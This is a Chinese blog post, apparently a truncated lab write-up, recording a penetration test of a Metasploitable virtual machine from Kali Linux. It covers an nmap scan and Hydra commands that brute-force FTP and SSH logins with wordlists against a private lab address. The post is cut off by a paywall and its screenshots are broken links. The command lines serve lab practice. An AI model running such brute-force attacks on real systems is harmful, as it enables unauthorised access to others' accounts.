本文详细记录了使用Kali Linux对Metasploitable靶机进行网络设置、端口扫描和渗透测试的过程,包括FTP、SSH的爆破,以及1524、1099、139、6667、6200和8180端口的漏洞利用,最终获取不同服务的root权限。
记一次kali渗透Metasploitbale靶机
1.网络设置
2.ifconfig查看Metasploitable的IP:
3.对Metasploitbale进行nmap端口扫描:
Nmap 192.168.22.128
端口爆破:FTP、SSH等
工具:Hydra
备用字典:user.txt: ![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-96A18fmY-1640349503054)(D:\应用\typora\Typora\resources\app\asserts\typora图片\clip_image002-1640348393516.jpg)]](https://i-blog.csdnimg.cn/blog_migrate/8f3d2150d6927fd63980c363bc9e5ac8.png)
pass,txt: ![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lz66hQty-1640349503056)(D:\应用\typora\Typora\resources\app\asserts\typora图片\clip_image004-1640348393524.jpg)]](https://i-blog.csdnimg.cn/blog_migrate/62c4c536a779cd7abbc11f1036ff78e3.png)
一、 爆破FTP
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MNRQbfl3-1640349503056)(D:\应用\typora\Typora\resources\app\asserts\typora图片\clip_image002-1640348429650.jpg)]](https://i-blog.csdnimg.cn/blog_migrate/d1bb9fdbab55397355833810679a1ab3.png)
hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt ftp://192.168.22.128
//注意路径是桌面还是Desktop
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FWa9X3vl-1640349503058)(D:\应用\typora\Typora\resources\app\asserts\typora图片\clip_image002-1640348436759.jpg)]](https://i-blog.csdnimg.cn/blog_migrate/09537a727b1c519538f6246602e88d6d.png)
二、 爆破SSH
hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt 192.168.22.128 ssh
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
